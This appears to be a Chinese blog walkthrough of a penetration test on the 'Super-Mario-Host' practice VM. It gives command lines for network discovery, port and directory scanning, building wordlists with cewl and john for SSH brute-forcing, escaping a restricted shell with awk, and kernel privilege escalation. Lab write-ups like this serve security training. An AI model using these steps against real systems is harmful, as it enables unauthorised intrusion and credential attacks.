1. 程式人生 > >kali滲透綜合靶機(七)--Super-Mario-Host靶機

kali滲透綜合靶機(七)--Super-Mario-Host靶機

kali滲透綜合靶機(七)--Super-Mario-Host靶機

靶機百度雲下載  連結:https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取碼:a8ox

一、主機發現

1.netdiscover -i eth0 -r 192.168.10.0/24

  

二、埠掃描

1. masscan --rate=10000 -p0-65535 192.168.10.160

  

三、埠服務識別

1.nmap -sV -T4 -O 192.168.10.160 -p 22,80

  

四、漏洞發現與利用

1.掃描網站目錄

Dirb http://192.168.10.161:8180

  

2.發現http://192.168.10.161:8180/vhosts

  

3. 在本地hosts檔案新增解析記錄

  

4.瀏覽器訪問http://mario.supermariohost.local:8180/,別的什麼都沒有

  

5. 使用dirbuster掃描目錄,掃描出來如下目錄

  

6. 發現http://mario.supermariohost.local:8180/luigi.php

  

7. 發現http://mario.supermariohost.local:8180/command.php  測試luigi,發現存在

  

8.使用cewl爬取站點下的可疑使用者名稱作為使用者名稱字典

cewl http://mario.supermariohost.local:8180/ -d -w /root/user.txt

9. john在該user的基礎上生成相應社工密碼進行爆破

john --wordlist=user.txt --stdout --rules > passwd.txt

10.爆破出密碼,使用ssh登入,發現是受限的shell,使用awk呼叫系統命令,繞過限制

awk ‘BEGIN{system(“/bin/bash”)}’

  

11.檢視核心版本,然後再kali使用searchsploit查詢是否有exp

  

12.開始提權,成功獲得管理員許可權

  

 

總結:

1.資訊收集

2.dirbuster、dirb掃描目錄

3.測試使用者是否存在

4.使用cewl爬取站點下的可疑使用者名稱作為使用者名稱字典

5.john在該user的基礎上生成相應社工密碼進行爆破

6.受用awk呼叫系統命令繞過受限的shell

7.利用核心版本漏洞本地